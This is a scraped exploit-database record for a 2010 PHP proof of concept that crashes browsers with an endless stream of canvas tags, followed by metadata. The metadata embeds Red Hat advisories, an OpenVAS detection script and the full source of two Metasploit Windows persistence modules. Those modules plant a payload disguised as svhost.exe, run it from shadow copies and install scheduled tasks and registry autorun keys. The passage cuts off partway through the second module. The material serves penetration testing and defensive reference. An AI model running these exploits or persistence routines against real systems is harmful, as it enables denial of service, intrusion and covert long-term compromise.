ID 1337DAY-ID-12022 Type zdt Reporter Jelmer de Hen Modified 2010-04-27T00:00:00
Description
Exploit for multiple platforms in the dos / poc category
==================================
Canvas tag DoS - Multiple Browsers
==================================
<?php
# Canvas tag DoS Internet Explorer 6.0 & 8.0
#
# Found by Jelmer de Hen
# published at http://h.ackack.net/?p=269
# tested on: Windows XP SP3
# Internet Explorer 6.0 & 8.0, Opera 10.52, Chrome 4.1, Firefox 3.6.3, Safari 4.0.5
#
# What this script does: it writes an HTML document whose body is an unbounded
# stream of "<canvas>" opening tags. The loop condition below is the constant 1
# and the loop body contains no break/return/exit, so output never stops and
# the closing </body></html> echoes after the loop are never reached.
#
# NOTE(review): nothing here bounds the run; whether the server ever stops it
# depends on runtime limits the script does not set (e.g. max_execution_time,
# output buffering) — confirm for the deployment before hosting it anywhere.
# The browser-side effect is not demonstrated by this code itself; it is only
# asserted by the "tested on" header above.
echo "<html><body>";
while (1){
echo "<canvas>";
}
# Unreachable: the preceding loop has no exit path.
echo "</body>";
echo "</html>";
?>
# 0day.today [2018-04-11] #
{"published": "2010-04-27T00:00:00", "id": "1337DAY-ID-12022", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:01:52", "bulletin": {"published": "2010-04-27T00:00:00", "id": "1337DAY-ID-12022", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.3, "modified": "2016-04-20T02:01:52", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "hash": "25a20051dfc0292ac8cfe12fa702ef263581dd5822a80323c3a6209fddf90ee7", "description": "Exploit for multiple platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-20T02:01:52", "edition": 1, "title": "Canvas tag DoS - Multiple Browsers", "href": "http://0day.today/exploit/description/12022", "modified": "2010-04-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/12022", "references": [], "reporter": "Jelmer de Hen", "sourceData": "==================================\r\nCanvas tag DoS - Multiple Browsers\r\n==================================\r\n\r\n<?php\r\n# Canvas tag DoS Internet Explorer 6.0 & 8.0\r\n#\r\n# Found by Jelmer de Hen\r\n# published at http://h.ackack.net/?p=269\r\n# tested on: Windows XP SP3\r\n# Internet Explorer 6.0 & 8.0, Opera 10.52, Chrome 4.1, Firefox 3.6.3, Safari 4.0.5\r\n \r\necho \"<html><body>\";\r\nwhile (1){\r\n echo \"<canvas>\";\r\n}\r\necho \"</body>\";\r\necho \"</html>\";\r\n?>\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7935825c7ededc2be15fe326826edd9b", "key": "sourceData"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "published"}, 
{"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "780f4f075f70fe41898cb17a089c04ba", "key": "sourceHref"}, {"hash": "ada50b6101c3a2c02b36202c81fba645", "key": "href"}, {"hash": "3ba4d423031dbdfcb1515c08f281fec4", "key": "title"}, {"hash": "eefcc58795c571457b35b97664b6d330", "key": "reporter"}, {"hash": "cdc2aa401057df1e80c0829fd5fd09a7", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for multiple platform in category dos / poc", "hash": "a9ffa4e932235355b48e1314906c824a26e824f3ed1d305a88fdf26356d2f53c", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-04-11T19:45:50"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_GET_XML", "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_GET_GRANTED_XML", "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_OPEN"]}, {"type": "zdt", "idList": ["1337DAY-ID-6796"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:12022", "SECURITYVULNS:VULN:5956"]}], "modified": "2018-04-11T19:45:50"}, "vulnersScore": -0.2}, "type": "zdt", "lastseen": "2018-04-11T19:45:50", "edition": 2, "title": "Canvas tag DoS - Multiple Browsers", "href": "https://0day.today/exploit/description/12022", "modified": "2010-04-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/12022", "references": [], "reporter": "Jelmer de Hen", "sourceData": "==================================\r\nCanvas tag DoS - Multiple Browsers\r\n==================================\r\n\r\n<?php\r\n# Canvas tag DoS Internet Explorer 6.0 & 8.0\r\n#\r\n# Found by Jelmer de Hen\r\n# published at http://h.ackack.net/?p=269\r\n# tested on: Windows XP SP3\r\n# Internet Explorer 6.0 & 8.0, Opera 10.52, Chrome 4.1, Firefox 3.6.3, Safari 4.0.5\r\n \r\necho \"<html><body>\";\r\nwhile (1){\r\n echo \"<canvas>\";\r\n}\r\necho \"</body>\";\r\necho \"</html>\";\r\n?>\r\n\r\n\n\n# 0day.today [2018-04-11] #", "hashmap": 
[{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cdc2aa401057df1e80c0829fd5fd09a7", "key": "description"}, {"hash": "0b488eed5d172dc41e63a6752113a59f", "key": "href"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "modified"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "eefcc58795c571457b35b97664b6d330", "key": "reporter"}, {"hash": "6c0ee1b33a975e3f1466d30005539e02", "key": "sourceData"}, {"hash": "70372f8ee759a8b993df6f6471998f92", "key": "sourceHref"}, {"hash": "3ba4d423031dbdfcb1515c08f281fec4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"redhat": [{"lastseen": "2019-07-22T16:50:26", "bulletinFamily": "unix", "description": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis release of Red Hat Process Automation Manager 7.4.0 serves as an update to Red Hat Process Automation Manager 7.3.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* jackson-databind: Potential information exfiltration with default typing, serialization gadget from MyBatis (CVE-2018-11307)\n\n* jackson-databind: improper polymorphic deserialization of types from Jodd-db library (CVE-2018-12022)\n\n* jackson-databind: improper polymorphic deserialization of types from Oracle JDBC driver (CVE-2018-12023)\n\n* jackson-databind: arbitrary code execution in slf4j-ext class (CVE-2018-14718)\n\n* jackson-databind: arbitrary code execution in blaze-ds-opt and blaze-ds-core classes (CVE-2018-14719)\n\n* jackson-databind: improper polymorphic deserialization in axis2-transport-jms class (CVE-2018-19360)\n\n* jackson-databind: improper polymorphic deserialization in openjpa class (CVE-2018-19361)\n\n* jackson-databind: improper polymorphic deserialization in jboss-common-core class (CVE-2018-19362)\n\n* jackson-databind: exfiltration/XXE in some JDK classes (CVE-2018-14720)\n\n* jackson-databind: server-side request forgery (SSRF) in axis2-jaxws class (CVE-2018-14721)\n\n* xstream: remote code execution due to insecure XML deserialization (CVE-2019-10173, regression of CVE-2013-7285)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-07-22T18:52:34", "published": 
"2019-07-22T18:52:01", "id": "RHSA-2019:1823", "href": "https://access.redhat.com/errata/RHSA-2019:1823", "type": "redhat", "title": "(RHSA-2019:1823) Important: Red Hat Process Automation Manager 7.4.0 Security Update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-22T16:51:54", "bulletinFamily": "unix", "description": "Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business. \n\nThis release of Red Hat Decision Manager 7.4.0 serves as an update to Red Hat Decision Manager 7.3.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* jackson-databind: Potential information exfiltration with default typing, serialization gadget from MyBatis (CVE-2018-11307)\n\n* jackson-databind: improper polymorphic deserialization of types from Jodd-db library (CVE-2018-12022)\n\n* jackson-databind: improper polymorphic deserialization of types from Oracle JDBC driver (CVE-2018-12023)\n\n* jackson-databind: arbitrary code execution in slf4j-ext class (CVE-2018-14718)\n\n* jackson-databind: arbitrary code execution in blaze-ds-opt and blaze-ds-core classes (CVE-2018-14719)\n\n* jackson-databind: improper polymorphic deserialization in axis2-transport-jms class (CVE-2018-19360)\n\n* jackson-databind: improper polymorphic deserialization in openjpa class (CVE-2018-19361)\n\n* jackson-databind: improper polymorphic deserialization in jboss-common-core class (CVE-2018-19362)\n\n* jackson-databind: exfiltration/XXE in some JDK classes (CVE-2018-14720)\n\n* jackson-databind: server-side request forgery (SSRF) in axis2-jaxws class (CVE-2018-14721)\n\n* xstream: remote code execution due to 
insecure XML deserialization (CVE-2019-10173, regression of CVE-2013-7285)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-07-22T18:52:26", "published": "2019-07-22T18:51:53", "id": "RHSA-2019:1822", "href": "https://access.redhat.com/errata/RHSA-2019:1822", "type": "redhat", "title": "(RHSA-2019:1822) Important: Red Hat Decision Manager 7.4.0 Security Update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-10-09T14:48:57", "bulletinFamily": "scanner", "description": "CMS Made Simple is prone to multiple cross-site scripting (XSS) vulnerabilities.", "modified": "2019-10-07T00:00:00", "published": "2019-04-29T00:00:00", "id": "OPENVAS:1361412562310113380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113380", "title": "CMS Made Simple <= 2.2.10 Reflected Multiple Cross-Site Scripting (XSS) Vulnerabilities", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113380\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-29 12:27:28 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_cve_id(\"CVE-2019-11513\", \"CVE-2019-11226\", \"CVE-2019-10105\", \"CVE-2019-10106\",\n \"CVE-2019-10107\", \"CVE-2019-10017\");\n\n script_name(\"CMS Made Simple <= 2.2.10 Reflected Multiple Cross-Site Scripting (XSS) Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"cms_made_simple_detect.nasl\");\n script_mandatory_keys(\"cmsmadesimple/installed\");\n\n script_tag(name:\"summary\", value:\"CMS Made Simple is prone to multiple cross-site scripting (XSS) vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - The File Manager is prone to reflected XSS via the 'New Name' field in a Rename action.\n\n - XSS Vulnerability via the m1_name parameter in 'Add Article' under Content->Content Manager->News.\n\n - Self-XSS Vulnerability via the Layout Design Manager 'Name' field, which is reachable via a\n 'Create a new Template' action to the 
Designer.\n\n - XSS Vulnerability via the moduleinterface.php 'Name' field, which is reachable via an\n 'Add Category' action to the 'Site Admin Settings - News module' section.\n\n - XSS Vulnerability via the myaccount.php 'Email Address' field, which is reachable via the\n 'My Preferences - My Account' section.\n\n - XSS Vulnerability via the moduleinterface.php Name field, which is reachable via an\n 'Add a new Profile' action to the File Picker.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an authenticated attacker to inject arbitrary\n JavaScript and HTML into the site.\");\n\n script_tag(name:\"affected\", value:\"CMS Made Simple through version 2.2.10.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 17th June, 2019.\n Information regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"http://dev.cmsmadesimple.org/bug/view/12022\");\n script_xref(name:\"URL\", value:\"http://dev.cmsmadesimple.org/bug/view/12001\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/153071/CMS-Made-Simple-2.2.10-Cross-Site-Scripting.html\");\n script_xref(name:\"URL\", value:\"https://ctrsec.io/index.php/2019/03/24/cmsmadesimple-xss-filepicker/\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:cmsmadesimple:cms_made_simple\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! 
version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less_equal( version: version, test_version: \"2.2.10\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"None Available\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "metasploit": [{"lastseen": "2019-11-24T02:44:15", "bulletinFamily": "exploit", "description": "This module will attempt to create a persistent payload in a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need password in order to start session on the target machine.\n", "modified": "2017-07-24T13:26:21", "published": "2013-10-15T16:11:04", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/VSS_PERSISTENCE", "href": "", "type": "metasploit", "title": "Persistent Payload in Windows Volume Shadow Copy", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::ShadowCopy\n include Msf::Post::Windows::Registry\n include Msf::Exploit::EXE\n\n def initialize(info={})\n\n super(update_info(info,\n 'Name' => \"Persistent Payload in Windows Volume Shadow Copy\",\n 'Description' => %q{\n This module will attempt to create a persistent payload in a new volume shadow copy. This is\n based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has\n been tested successfully on Windows 7. 
In order to achieve persistence through the RUNKEY\n option, the user should need password in order to start session on the target machine.\n },\n 'Author' => ['Jedediah Rodriguez <Jedi.rodriguez[at]gmail.com>'], # @MrXors\n 'License' => MSF_LICENSE,\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [ [ 'Windows 7', {} ] ],\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ],\n [ 'URL', 'http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows']\n ],\n 'DisclosureDate'=> \"Oct 21 2011\"\n ))\n\n register_options(\n [\n OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\\\']),\n OptBool.new('EXECUTE', [ true, 'Run the EXE on the remote system.', true]),\n OptBool.new('SCHTASK', [ true, 'Create a Scheduled Task for the EXE.', false]),\n OptBool.new('RUNKEY', [ true, 'Create AutoRun Key for the EXE', false]),\n OptInt.new('DELAY', [ true, 'Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.', 1]),\n OptString.new('RPATH', [ false, 'Path on remote system to place Executable. 
Example: \\\\\\\\Windows\\\\\\\\Temp (DO NOT USE C:\\\\ in your RPATH!)', ]),\n ])\n\n end\n\n def exploit\n @clean_up = \"\"\n\n print_status(\"Checking requirements...\")\n\n os = sysinfo['OS']\n unless os =~ /Windows 7/\n print_warning(\"This module has been tested only on Windows 7\")\n end\n\n unless is_admin?\n print_error(\"This module requires admin privs to run\")\n return\n end\n\n unless is_high_integrity?\n print_error(\"This module requires UAC to be bypassed first\")\n return\n end\n\n print_status(\"Starting Volume Shadow Service...\")\n unless start_vss\n print_error(\"Unable to start the Volume Shadow Service\")\n return\n end\n\n print_status(\"Uploading payload...\")\n remote_file = upload(datastore['RPATH'])\n\n print_status(\"Creating Shadow Volume Copy...\")\n unless volume_shadow_copy\n fail_with(Failure::Unknown, \"Failed to create a new shadow copy\")\n end\n\n print_status(\"Finding the Shadow Copy Volume...\")\n volume_data_id = []\n cmd = \"cmd.exe /c vssadmin List Shadows| find \\\"Shadow Copy Volume\\\"\"\n output = cmd_exec(cmd)\n output.each_line do |line|\n cmd_regex = /HarddiskVolumeShadowCopy\\d{1,9}/.match(\"#{line}\")\n volume_data_id = \"#{cmd_regex}\"\n end\n\n print_status(\"Deleting malware...\")\n file_rm(remote_file)\n\n if datastore[\"EXECUTE\"]\n print_status(\"Executing #{remote_file}...\")\n execute(volume_data_id, remote_file)\n end\n\n if datastore[\"SCHTASK\"]\n print_status(\"Creating Scheduled Task...\")\n schtasks(volume_data_id, remote_file)\n end\n\n if datastore[\"RUNKEY\"]\n print_status(\"Installing as autorun in the registry...\")\n install_registry(volume_data_id, remote_file)\n end\n\n unless @clean_up.empty?\n log_file\n end\n end\n\n def upload(trg_loc=\"\")\n if trg_loc.nil? 
or trg_loc.empty?\n location = \"\\\\Windows\\\\Temp\"\n else\n location = trg_loc\n end\n\n file_name = \"svhost#{rand(100)}.exe\"\n file_on_target = \"#{location}\\\\#{file_name}\"\n\n exe = generate_payload_exe\n\n begin\n write_file(\"#{file_on_target}\", exe)\n rescue ::Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::NotFound, e.message)\n end\n\n return file_on_target\n end\n\n def volume_shadow_copy\n begin\n id = create_shadowcopy(datastore['VOLUME'])\n rescue ::Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::NotFound, e.message)\n end\n\n if id\n return true\n else\n return false\n end\n end\n\n def execute(volume_id, exe_path)\n run_cmd = \"cmd.exe /c %SYSTEMROOT%\\\\system32\\\\wbem\\\\wmic.exe process call create \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\#{volume_id}\\\\#{exe_path}\"\n cmd_exec(run_cmd)\n end\n\n def schtasks(volume_id, exe_path)\n sch_name = Rex::Text.rand_text_alpha(rand(8)+8)\n global_root = \"\\\"\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\#{volume_id}\\\\#{exe_path}\\\"\"\n sch_cmd = \"cmd.exe /c %SYSTEMROOT%\\\\system32\\\\schtasks.exe /create /sc minute /mo #{datastore[\"DELAY\"]} /tn \\\"#{sch_name}\\\" /tr #{global_root}\"\n cmd_exec(sch_cmd)\n @clean_up << \"execute -H -f cmd.exe -a \\\"/c schtasks.exe /delete /tn #{sch_name} /f\\\"\\n\"\n end\n\n def install_registry(volume_id, exe_path)\n global_root = \"cmd.exe /c %SYSTEMROOT%\\\\system32\\\\wbem\\\\wmic.exe process call create \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\#{volume_id}\\\\#{exe_path}\"\n nam = Rex::Text.rand_text_alpha(rand(8)+8)\n hklm_key = \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"\n print_status(\"Installing into autorun as #{hklm_key}\\\\#{nam}\")\n res = registry_setvaldata(\"#{hklm_key}\", nam, \"#{global_root}\", \"REG_SZ\")\n if res\n print_good(\"Installed into autorun as #{hklm_key}\\\\#{nam}\")\n @clean_up << \"reg deleteval -k 
HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run -v #{nam}\\n\"\n else\n print_error(\"Error: failed to open the registry key for writing\")\n end\n end\n\n def clean_data\n host = session.sys.config.sysinfo[\"Computer\"]\n filenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )\n ::FileUtils.mkdir_p(logs)\n logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + \".rc\"\n return logfile\n end\n\n def log_file\n clean_rc = clean_data()\n file_local_write(clean_rc, @clean_up)\n print_status(\"Cleanup Meterpreter RC File: #{clean_rc}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/vss_persistence.rb"}, {"lastseen": "2019-11-28T01:09:10", "bulletinFamily": "exploit", "description": "This module will install a payload that is executed during boot. 
It will be executed either at user logon or system startup via the registry value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n", "modified": "2017-07-24T13:26:21", "published": "2013-02-07T23:11:44", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/PERSISTENCE", "href": "", "type": "metasploit", "title": "Windows Persistent Registry Startup Payload Installer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/common'\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\nrequire 'msf/core/post/windows/registry'\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Registry\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows Persistent Registry Startup Payload Installer',\n 'Description' => %q{\n This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Carlos Perez <carlos_perez[at]darkoperator.com>',\n 'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [ [ 'Windows', {} ] ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => \"Oct 19 2011\",\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => 'true'\n }\n ))\n\n register_options([\n OptInt.new('DELAY',\n [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),\n OptEnum.new('STARTUP',\n [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),\n 
OptString.new('VBS_NAME',\n [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),\n OptString.new('EXE_NAME',\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\n OptString.new('REG_NAME',\n [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),\n OptString.new('PATH',\n [false, 'Path to write payload (%TEMP% by default).', nil])\n ])\n\n register_advanced_options([\n OptBool.new('HANDLER',\n [false, 'Start an exploit/multi/handler job to receive the connection', false]),\n OptBool.new('EXEC_AFTER',\n [false, 'Execute persistent script after installing.', false])\n ])\n end\n\n # Exploit method for when exploit command is issued\n def exploit\n # Define default values\n rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\n rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\n reg_val = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\n startup = datastore['STARTUP'].downcase\n delay = datastore['DELAY']\n exec_after = datastore['EXEC_AFTER']\n handler = datastore['HANDLER']\n @clean_up_rc = \"\"\n\n rvbs_name = rvbs_name + '.vbs' if rvbs_name[-4,4] != '.vbs'\n rexe_name = rexe_name + '.exe' if rexe_name[-4,4] != '.exe'\n\n # Connect to the session\n begin\n host = session.session_host\n print_status(\"Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue => e\n print_error(\"Could not connect to session: #{e}\")\n return nil\n end\n\n # Check values\n if is_system? && startup == 'user'\n print_warning('Note: Current user is SYSTEM & STARTUP == USER. 
This user may not login often!')\n end\n\n if handler && !datastore['DisablePayloadHandler']\n # DisablePayloadHandler will stop listening after the script finishes - we want a job so it continues afterwards!\n print_warning(\"Note: HANDLER == TRUE && DisablePayloadHandler == TRUE. This will create issues...\")\n print_warning(\"Disabling HANDLER...\")\n handler = false\n end\n\n # Generate the exe payload\n vprint_status(\"Generating EXE payload (#{rexe_name})\")\n exe = generate_payload_exe\n # Generate the vbs payload\n vprint_status(\"Generating VBS persistent script (#{rvbs_name})\")\n vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})\n # Writing the payload to target\n vprint_status(\"Writing payload inside the VBS script on the target\")\n script_on_target = write_script_to_target(vbsscript, rvbs_name)\n # Exit the module because we failed to write the file on the target host\n # Feedback has already been given to the user, via the function.\n return unless script_on_target\n\n # Initial execution of persistent script\n case startup\n when 'user'\n # If we could not write the entry in the registy we exit the module.\n return unless write_to_reg(\"HKCU\", script_on_target, reg_val)\n vprint_status(\"Payload will execute when USER (#{session.sys.config.getuid}) next logs on\")\n when 'system'\n # If we could not write the entry in the registy we exit the module.\n return unless write_to_reg(\"HKLM\", script_on_target, reg_val)\n vprint_status(\"Payload will execute at the next SYSTEM startup\")\n else\n print_error(\"Something went wrong. 
Invalid STARTUP method: #{startup}\")\n return nil\n end\n\n # Do we setup a exploit/multi/handler job?\n if handler\n listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])\n if listener_job_id.blank?\n print_error(\"Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.\")\n end\n end\n\n # Do we execute the VBS script afterwards?\n target_exec(script_on_target) if exec_after\n\n # Create 'clean up' resource file\n clean_rc = log_file()\n file_local_write(clean_rc, @clean_up_rc)\n print_status(\"Clean up Meterpreter RC file: #{clean_rc}\")\n\n report_note(:host => host,\n :type => \"host.persistance.cleanup\",\n :data => {\n :local_id => session.sid,\n :stype => session.type,\n :desc => session.info,\n :platform => session.platform,\n :via_payload => session.via_payload,\n :via_exploit => session.via_exploit,\n :created_at => Time.now.utc,\n :commands => @clean_up_rc\n }\n )\n end\n\n # Writes script to target host and returns the pathname of the target file or nil if the\n # file could not be written.\n def write_script_to_target(vbs, name)\n filename = name || Rex::Text.rand_text_alpha((rand(8)+6)) + \".vbs\"\n temppath = datastore['PATH'] || session.sys.config.getenv('TEMP')\n filepath = temppath + \"\\\\\" + filename\n\n unless directory?(temppath)\n print_error(\"#{temppath} does not exists on the target\")\n return nil\n end\n\n if file?(filepath)\n print_warning(\"#{filepath} already exists on the target. 
Deleting...\")\n begin\n file_rm(filepath)\n print_good(\"Deleted #{filepath}\")\n rescue\n print_error(\"Unable to delete file!\")\n return nil\n end\n end\n\n begin\n write_file(filepath, vbs)\n print_good(\"Persistent VBS script written on #{sysinfo['Computer']} to #{filepath}\")\n\n # Escape windows pathname separators.\n @clean_up_rc << \"rm #{filepath.gsub(/\\\\/, '//')}\\n\"\n rescue\n print_error(\"Could not write the payload on the target\")\n # Return nil since we could not write the file on the target\n filepath = nil\n end\n\n filepath\n end\n\n # Installs payload in to the registry HKLM or HKCU\n def write_to_reg(key, script_on_target, registry_value)\n regsuccess = true\n nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)\n key_path = \"#{key.to_s}\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"\n\n print_status(\"Installing as #{key_path}\\\\#{nam}\")\n\n if key && registry_setvaldata(key_path, nam, script_on_target, \"REG_SZ\")\n print_good(\"Installed autorun on #{sysinfo['Computer']} as #{key_path}\\\\#{nam}\")\n else\n print_error(\"Failed to make entry in the registry for persistence\")\n regsuccess = false\n end\n\n regsuccess\n end\n\n # Executes script on target and returns true if it was successfully started\n def target_exec(script_on_target)\n execsuccess = true\n print_status(\"Executing script #{script_on_target}\")\n # Lets give the target a few seconds to catch up...\n Rex.sleep(3)\n\n # Error handling for process.execute() can throw a RequestError in send_request.\n begin\n unless datastore['EXE::Custom']\n cmd_exec(\"wscript \\\"#{script_on_target}\\\"\")\n else\n cmd_exec(\"cscript \\\"#{script_on_target}\\\"\")\n end\n rescue\n print_error(\"Failed to execute 